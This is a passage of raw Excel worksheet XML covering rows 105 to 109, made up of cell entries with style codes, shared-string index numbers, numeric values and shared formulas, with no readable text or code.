      <c r="D105" s="72" t="s">
        <v>1020</v>
      </c>
      <c r="E105" s="72" t="s">
        <v>1089</v>
      </c>
      <c r="F105" s="72" t="s">
        <v>1090</v>
      </c>
      <c r="G105" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H105" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I105" s="73" t="s">
        <v>1091</v>
      </c>
      <c r="J105" s="73" t="s">
        <v>1092</v>
      </c>
      <c r="K105" s="73" t="s">
        <v>1093</v>
      </c>
      <c r="L105" s="74"/>
      <c r="M105" s="74">
        <v>1.0</v>
      </c>
      <c r="N105" s="74">
        <v>1.0</v>
      </c>
      <c r="O105" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P105" s="74">
        <v>1.0</v>
      </c>
      <c r="Q105" s="74">
        <v>0.0</v>
      </c>
      <c r="R105" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S105" s="76" t="s">
        <v>1094</v>
      </c>
      <c r="T105" s="76" t="s">
        <v>1095</v>
      </c>
      <c r="U105" s="77" t="s">
        <v>1096</v>
      </c>
      <c r="V105" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W105" s="109"/>
      <c r="X105" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y105" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z105" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA105" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB105" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC105" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD105" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE105" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF105" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG105" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH105" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI105" s="78"/>
      <c r="AJ105" s="78"/>
      <c r="AK105" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL105" s="78"/>
      <c r="AM105" s="78"/>
      <c r="AN105" s="78"/>
      <c r="AO105" s="78"/>
      <c r="AP105" s="80"/>
      <c r="AQ105" s="80"/>
      <c r="AR105" s="80"/>
      <c r="AS105" s="80">
        <v>0.0</v>
      </c>
      <c r="AT105" s="80"/>
      <c r="AU105" s="80"/>
      <c r="AV105" s="80"/>
      <c r="AW105" s="80"/>
      <c r="AX105" s="80"/>
      <c r="AY105" s="80"/>
      <c r="AZ105" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA105" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB105" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC105" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD105" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE105" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF105" s="82"/>
      <c r="BG105" s="82"/>
      <c r="BH105" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI105" s="82"/>
      <c r="BJ105" s="82"/>
      <c r="BK105" s="82"/>
      <c r="BL105" s="82"/>
      <c r="BM105" s="83"/>
      <c r="BN105" s="83"/>
      <c r="BO105" s="83"/>
      <c r="BP105" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ105" s="83"/>
      <c r="BR105" s="83"/>
      <c r="BS105" s="83"/>
      <c r="BT105" s="83"/>
      <c r="BU105" s="83"/>
      <c r="BV105" s="83"/>
      <c r="BW105" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX105" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY105" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ105" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA105" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB105" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC105" s="85"/>
      <c r="CD105" s="85"/>
      <c r="CE105" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF105" s="85"/>
      <c r="CG105" s="85"/>
      <c r="CH105" s="85"/>
      <c r="CI105" s="85"/>
      <c r="CJ105" s="86"/>
      <c r="CK105" s="86"/>
      <c r="CL105" s="86"/>
      <c r="CM105" s="86">
        <v>0.0</v>
      </c>
      <c r="CN105" s="86"/>
      <c r="CO105" s="86"/>
      <c r="CP105" s="86"/>
      <c r="CQ105" s="86"/>
      <c r="CR105" s="86"/>
      <c r="CS105" s="86"/>
      <c r="CT105" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU105" s="88" t="s">
        <v>1097</v>
      </c>
      <c r="CV105" s="88">
        <v>2.0</v>
      </c>
      <c r="CW105" s="88">
        <v>109.0</v>
      </c>
      <c r="CX105" s="79">
        <v>2001117.0</v>
      </c>
      <c r="CY105" s="88">
        <v>2003195.0</v>
      </c>
      <c r="CZ105" s="88"/>
      <c r="DA105" s="88"/>
      <c r="DB105" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC105" s="88"/>
      <c r="DD105" s="88"/>
      <c r="DE105" s="88"/>
      <c r="DF105" s="88"/>
      <c r="DG105" s="89"/>
      <c r="DH105" s="89"/>
      <c r="DI105" s="89"/>
      <c r="DJ105" s="89">
        <v>0.0</v>
      </c>
      <c r="DK105" s="89"/>
      <c r="DL105" s="89"/>
      <c r="DM105" s="89"/>
      <c r="DN105" s="89"/>
      <c r="DO105" s="89"/>
      <c r="DP105" s="89"/>
      <c r="DQ105" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR105" s="91"/>
      <c r="DS105" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT105" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU105" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV105" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW105" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX105" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY105" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ105" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA105" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB105" s="74"/>
      <c r="EC105" s="74">
        <v>0.0</v>
      </c>
      <c r="ED105" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE105" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="106" ht="153.75" customHeight="1">
      <c r="B106" s="71" t="s">
        <v>397</v>
      </c>
      <c r="C106" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D106" s="72" t="s">
        <v>1020</v>
      </c>
      <c r="E106" s="72" t="s">
        <v>1089</v>
      </c>
      <c r="F106" s="72" t="s">
        <v>1090</v>
      </c>
      <c r="G106" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H106" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I106" s="73" t="s">
        <v>1091</v>
      </c>
      <c r="J106" s="73" t="s">
        <v>1092</v>
      </c>
      <c r="K106" s="73" t="s">
        <v>1098</v>
      </c>
      <c r="L106" s="74"/>
      <c r="M106" s="74">
        <v>1.0</v>
      </c>
      <c r="N106" s="74">
        <v>1.0</v>
      </c>
      <c r="O106" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P106" s="74">
        <v>1.0</v>
      </c>
      <c r="Q106" s="74">
        <v>0.0</v>
      </c>
      <c r="R106" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S106" s="76" t="s">
        <v>1094</v>
      </c>
      <c r="T106" s="76" t="s">
        <v>1095</v>
      </c>
      <c r="U106" s="77" t="s">
        <v>1096</v>
      </c>
      <c r="V106" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W106" s="109"/>
      <c r="X106" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y106" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z106" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA106" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB106" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC106" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD106" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE106" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF106" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG106" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH106" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI106" s="78"/>
      <c r="AJ106" s="78"/>
      <c r="AK106" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL106" s="78"/>
      <c r="AM106" s="78"/>
      <c r="AN106" s="78"/>
      <c r="AO106" s="78"/>
      <c r="AP106" s="80"/>
      <c r="AQ106" s="80"/>
      <c r="AR106" s="80"/>
      <c r="AS106" s="80">
        <v>0.0</v>
      </c>
      <c r="AT106" s="80"/>
      <c r="AU106" s="80"/>
      <c r="AV106" s="80"/>
      <c r="AW106" s="80"/>
      <c r="AX106" s="80"/>
      <c r="AY106" s="80"/>
      <c r="AZ106" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA106" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB106" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC106" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD106" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE106" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF106" s="82"/>
      <c r="BG106" s="82"/>
      <c r="BH106" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI106" s="82"/>
      <c r="BJ106" s="82"/>
      <c r="BK106" s="82"/>
      <c r="BL106" s="82"/>
      <c r="BM106" s="83"/>
      <c r="BN106" s="83"/>
      <c r="BO106" s="83"/>
      <c r="BP106" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ106" s="83"/>
      <c r="BR106" s="83"/>
      <c r="BS106" s="83"/>
      <c r="BT106" s="83"/>
      <c r="BU106" s="83"/>
      <c r="BV106" s="83"/>
      <c r="BW106" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX106" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY106" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ106" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA106" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB106" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC106" s="85"/>
      <c r="CD106" s="85"/>
      <c r="CE106" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF106" s="85"/>
      <c r="CG106" s="85"/>
      <c r="CH106" s="85"/>
      <c r="CI106" s="85"/>
      <c r="CJ106" s="86"/>
      <c r="CK106" s="86"/>
      <c r="CL106" s="86"/>
      <c r="CM106" s="86">
        <v>0.0</v>
      </c>
      <c r="CN106" s="86"/>
      <c r="CO106" s="86"/>
      <c r="CP106" s="86"/>
      <c r="CQ106" s="86"/>
      <c r="CR106" s="86"/>
      <c r="CS106" s="86"/>
      <c r="CT106" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU106" s="88" t="s">
        <v>1097</v>
      </c>
      <c r="CV106" s="88">
        <v>2.0</v>
      </c>
      <c r="CW106" s="88">
        <v>109.0</v>
      </c>
      <c r="CX106" s="79">
        <v>2001117.0</v>
      </c>
      <c r="CY106" s="88">
        <v>2003195.0</v>
      </c>
      <c r="CZ106" s="88"/>
      <c r="DA106" s="88"/>
      <c r="DB106" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC106" s="88"/>
      <c r="DD106" s="88"/>
      <c r="DE106" s="88"/>
      <c r="DF106" s="88"/>
      <c r="DG106" s="89"/>
      <c r="DH106" s="89"/>
      <c r="DI106" s="89"/>
      <c r="DJ106" s="89">
        <v>0.0</v>
      </c>
      <c r="DK106" s="89"/>
      <c r="DL106" s="89"/>
      <c r="DM106" s="89"/>
      <c r="DN106" s="89"/>
      <c r="DO106" s="89"/>
      <c r="DP106" s="89"/>
      <c r="DQ106" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR106" s="91"/>
      <c r="DS106" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT106" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU106" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV106" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW106" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX106" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY106" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ106" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA106" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB106" s="74"/>
      <c r="EC106" s="74">
        <v>0.0</v>
      </c>
      <c r="ED106" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE106" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="107" ht="153.75" customHeight="1">
      <c r="B107" s="71" t="s">
        <v>1099</v>
      </c>
      <c r="C107" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D107" s="72" t="s">
        <v>1100</v>
      </c>
      <c r="E107" s="72" t="s">
        <v>1101</v>
      </c>
      <c r="F107" s="72" t="s">
        <v>1102</v>
      </c>
      <c r="G107" s="72" t="s">
        <v>411</v>
      </c>
      <c r="H107" s="72" t="s">
        <v>1103</v>
      </c>
      <c r="I107" s="73" t="s">
        <v>1104</v>
      </c>
      <c r="J107" s="73" t="s">
        <v>411</v>
      </c>
      <c r="K107" s="73" t="s">
        <v>1105</v>
      </c>
      <c r="L107" s="74">
        <v>1.0</v>
      </c>
      <c r="M107" s="74">
        <v>1.0</v>
      </c>
      <c r="N107" s="74">
        <v>1.0</v>
      </c>
      <c r="O107" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P107" s="74">
        <v>1.0</v>
      </c>
      <c r="Q107" s="74">
        <v>0.0</v>
      </c>
      <c r="R107" s="172" t="s">
        <v>373</v>
      </c>
      <c r="S107" s="173" t="s">
        <v>1106</v>
      </c>
      <c r="T107" s="173" t="s">
        <v>12</v>
      </c>
      <c r="U107" s="174" t="s">
        <v>1107</v>
      </c>
      <c r="V107" s="173" t="s">
        <v>1108</v>
      </c>
      <c r="W107" s="175" t="s">
        <v>1109</v>
      </c>
      <c r="X107" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y107" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z107" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA107" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB107" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC107" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AD107" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE107" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF107" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG107" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH107" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI107" s="78"/>
      <c r="AJ107" s="78"/>
      <c r="AK107" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL107" s="78"/>
      <c r="AM107" s="78"/>
      <c r="AN107" s="78"/>
      <c r="AO107" s="78"/>
      <c r="AP107" s="80"/>
      <c r="AQ107" s="80"/>
      <c r="AR107" s="80"/>
      <c r="AS107" s="80">
        <v>0.0</v>
      </c>
      <c r="AT107" s="80"/>
      <c r="AU107" s="80"/>
      <c r="AV107" s="80"/>
      <c r="AW107" s="80"/>
      <c r="AX107" s="80"/>
      <c r="AY107" s="80"/>
      <c r="AZ107" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA107" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB107" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC107" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD107" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE107" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF107" s="82"/>
      <c r="BG107" s="82"/>
      <c r="BH107" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI107" s="82"/>
      <c r="BJ107" s="82"/>
      <c r="BK107" s="82"/>
      <c r="BL107" s="82"/>
      <c r="BM107" s="83"/>
      <c r="BN107" s="83"/>
      <c r="BO107" s="83"/>
      <c r="BP107" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ107" s="83"/>
      <c r="BR107" s="83"/>
      <c r="BS107" s="83"/>
      <c r="BT107" s="83"/>
      <c r="BU107" s="83"/>
      <c r="BV107" s="83"/>
      <c r="BW107" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX107" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY107" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ107" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA107" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB107" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC107" s="85"/>
      <c r="CD107" s="85"/>
      <c r="CE107" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF107" s="85"/>
      <c r="CG107" s="85"/>
      <c r="CH107" s="85"/>
      <c r="CI107" s="85"/>
      <c r="CJ107" s="86"/>
      <c r="CK107" s="86"/>
      <c r="CL107" s="86"/>
      <c r="CM107" s="86">
        <v>0.0</v>
      </c>
      <c r="CN107" s="86"/>
      <c r="CO107" s="86"/>
      <c r="CP107" s="86"/>
      <c r="CQ107" s="86"/>
      <c r="CR107" s="86"/>
      <c r="CS107" s="86"/>
      <c r="CT107" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU107" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV107" s="88">
        <v>2.0</v>
      </c>
      <c r="CW107" s="88">
        <v>2.0</v>
      </c>
      <c r="CX107" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY107" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ107" s="88"/>
      <c r="DA107" s="88"/>
      <c r="DB107" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC107" s="88"/>
      <c r="DD107" s="88"/>
      <c r="DE107" s="88"/>
      <c r="DF107" s="88"/>
      <c r="DG107" s="89"/>
      <c r="DH107" s="89"/>
      <c r="DI107" s="89"/>
      <c r="DJ107" s="89">
        <v>0.0</v>
      </c>
      <c r="DK107" s="89"/>
      <c r="DL107" s="89"/>
      <c r="DM107" s="89"/>
      <c r="DN107" s="89"/>
      <c r="DO107" s="89"/>
      <c r="DP107" s="89"/>
      <c r="DQ107" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR107" s="91"/>
      <c r="DS107" s="93"/>
      <c r="DT107" s="93"/>
      <c r="DU107" s="93"/>
      <c r="DV107" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW107" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX107" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY107" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ107" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA107" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB107" s="74"/>
      <c r="EC107" s="74"/>
      <c r="ED107" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE107" s="96"/>
    </row>
    <row r="108" ht="153.75" customHeight="1">
      <c r="B108" s="71" t="s">
        <v>1099</v>
      </c>
      <c r="C108" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D108" s="72" t="s">
        <v>1100</v>
      </c>
      <c r="E108" s="72" t="s">
        <v>1110</v>
      </c>
      <c r="F108" s="72" t="s">
        <v>1111</v>
      </c>
      <c r="G108" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H108" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I108" s="73" t="s">
        <v>1112</v>
      </c>
      <c r="J108" s="73" t="s">
        <v>441</v>
      </c>
      <c r="K108" s="73" t="s">
        <v>1113</v>
      </c>
      <c r="L108" s="74">
        <v>24.0</v>
      </c>
      <c r="M108" s="74">
        <v>1.0</v>
      </c>
      <c r="N108" s="74">
        <v>1.0</v>
      </c>
      <c r="O108" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P108" s="74">
        <v>1.0</v>
      </c>
      <c r="Q108" s="74">
        <v>0.0</v>
      </c>
      <c r="R108" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S108" s="76" t="s">
        <v>1114</v>
      </c>
      <c r="T108" s="76" t="s">
        <v>1115</v>
      </c>
      <c r="U108" s="77" t="s">
        <v>1116</v>
      </c>
      <c r="V108" s="76" t="s">
        <v>1117</v>
      </c>
      <c r="W108" s="76" t="s">
        <v>1118</v>
      </c>
      <c r="X108" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y108" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z108" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA108" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB108" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC108" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD108" s="101">
        <v>42944.0</v>
      </c>
      <c r="AE108" s="78">
        <v>1.0</v>
      </c>
      <c r="AF108" s="78">
        <v>1.0</v>
      </c>
      <c r="AG108" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH108" s="101">
        <v>42944.0</v>
      </c>
      <c r="AI108" s="101"/>
      <c r="AJ108" s="101"/>
      <c r="AK108" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL108" s="101"/>
      <c r="AM108" s="101"/>
      <c r="AN108" s="101"/>
      <c r="AO108" s="101"/>
      <c r="AP108" s="80"/>
      <c r="AQ108" s="80"/>
      <c r="AR108" s="80"/>
      <c r="AS108" s="80">
        <v>1.0</v>
      </c>
      <c r="AT108" s="80"/>
      <c r="AU108" s="80"/>
      <c r="AV108" s="80"/>
      <c r="AW108" s="80"/>
      <c r="AX108" s="80"/>
      <c r="AY108" s="80"/>
      <c r="AZ108" s="81">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="BA108" s="102" t="s">
        <v>1119</v>
      </c>
      <c r="BB108" s="82">
        <v>5.0</v>
      </c>
      <c r="BC108" s="82">
        <v>6.0</v>
      </c>
      <c r="BD108" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE108" s="102" t="s">
        <v>1119</v>
      </c>
      <c r="BF108" s="102"/>
      <c r="BG108" s="102"/>
      <c r="BH108" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI108" s="102"/>
      <c r="BJ108" s="102"/>
      <c r="BK108" s="102"/>
      <c r="BL108" s="102"/>
      <c r="BM108" s="103"/>
      <c r="BN108" s="103"/>
      <c r="BO108" s="103"/>
      <c r="BP108" s="83">
        <v>1.0</v>
      </c>
      <c r="BQ108" s="83"/>
      <c r="BR108" s="83"/>
      <c r="BS108" s="83"/>
      <c r="BT108" s="83"/>
      <c r="BU108" s="83"/>
      <c r="BV108" s="83"/>
      <c r="BW108" s="84">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="BX108" s="105" t="s">
        <v>1120</v>
      </c>
      <c r="BY108" s="85">
        <v>9.0</v>
      </c>
      <c r="BZ108" s="85">
        <v>14.0</v>
      </c>
      <c r="CA108" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB108" s="105" t="s">
        <v>1120</v>
      </c>
      <c r="CC108" s="105"/>
      <c r="CD108" s="105"/>
      <c r="CE108" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF108" s="105"/>
      <c r="CG108" s="105"/>
      <c r="CH108" s="105"/>
      <c r="CI108" s="105"/>
      <c r="CJ108" s="106"/>
      <c r="CK108" s="106"/>
      <c r="CL108" s="106"/>
      <c r="CM108" s="86">
        <v>1.0</v>
      </c>
      <c r="CN108" s="86"/>
      <c r="CO108" s="86"/>
      <c r="CP108" s="86"/>
      <c r="CQ108" s="86"/>
      <c r="CR108" s="86"/>
      <c r="CS108" s="86"/>
      <c r="CT108" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU108" s="104" t="s">
        <v>1121</v>
      </c>
      <c r="CV108" s="88">
        <v>15.0</v>
      </c>
      <c r="CW108" s="88">
        <v>25.0</v>
      </c>
      <c r="CX108" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY108" s="104" t="s">
        <v>1122</v>
      </c>
      <c r="CZ108" s="104"/>
      <c r="DA108" s="104"/>
      <c r="DB108" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC108" s="104"/>
      <c r="DD108" s="104"/>
      <c r="DE108" s="104"/>
      <c r="DF108" s="104"/>
      <c r="DG108" s="89"/>
      <c r="DH108" s="89"/>
      <c r="DI108" s="89"/>
      <c r="DJ108" s="89">
        <v>1.0</v>
      </c>
      <c r="DK108" s="89"/>
      <c r="DL108" s="89"/>
      <c r="DM108" s="89"/>
      <c r="DN108" s="89"/>
      <c r="DO108" s="89"/>
      <c r="DP108" s="89"/>
      <c r="DQ108" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR108" s="91"/>
      <c r="DS108" s="92" t="s">
        <v>1123</v>
      </c>
      <c r="DT108" s="93">
        <v>3.0</v>
      </c>
      <c r="DU108" s="93">
        <v>3.0</v>
      </c>
      <c r="DV108" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW108" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX108" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY108" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ108" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA108" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB108" s="74">
        <v>24.0</v>
      </c>
      <c r="EC108" s="74">
        <v>1.0</v>
      </c>
      <c r="ED108" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE108" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="109" ht="153.75" customHeight="1">
      <c r="B109" s="71" t="s">
        <v>1099</v>
      </c>
      <c r="C109" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D109" s="72" t="s">
        <v>1100</v>
      </c>
      <c r="E109" s="72" t="s">
        <v>1110</v>
      </c>
      <c r="F109" s="72" t="s">
        <v>1111</v>
      </c>
      <c r="G109" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H109" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I109" s="73" t="s">
        <v>1124</v>
      </c>
      <c r="J109" s="73" t="s">
        <v>1125</v>
      </c>
      <c r="K109" s="73" t="s">
        <v>1126</v>
      </c>
      <c r="L109" s="74">
        <v>260.0</v>
      </c>
      <c r="M109" s="74">
        <v>1.0</v>
      </c>
      <c r="N109" s="74">
        <v>1.0</v>
      </c>
      <c r="O109" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P109" s="74">
        <v>1.0</v>
      </c>
      <c r="Q109" s="74">
        <v>0.0</v>
      </c>
      <c r="R109" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S109" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T109" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U109" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V109" s="76" t="s">
        <v>1127</v>
      </c>
      <c r="W109" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X109" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y109" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z109" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA109" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB109" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC109" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD109" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AE109" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF109" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG109" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH109" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AI109" s="101"/>
      <c r="AJ109" s="101"/>
      <c r="AK109" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL109" s="101"/>
      <c r="AM109" s="101"/>
      <c r="AN109" s="101"/>
      <c r="AO109" s="101"/>
      <c r="AP109" s="80"/>
      <c r="AQ109" s="80"/>
      <c r="AR109" s="80"/>
      <c r="AS109" s="80">
        <v>0.0</v>
      </c>
      <c r="AT109" s="80"/>
      <c r="AU109" s="80"/>
      <c r="AV109" s="80"/>
      <c r="AW109" s="80"/>
      <c r="AX109" s="80"/>
      <c r="AY109" s="80"/>
      <c r="AZ109" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA109" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BB109" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC109" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD109" s="79" t="s">
        <v>481</v>
      </c>
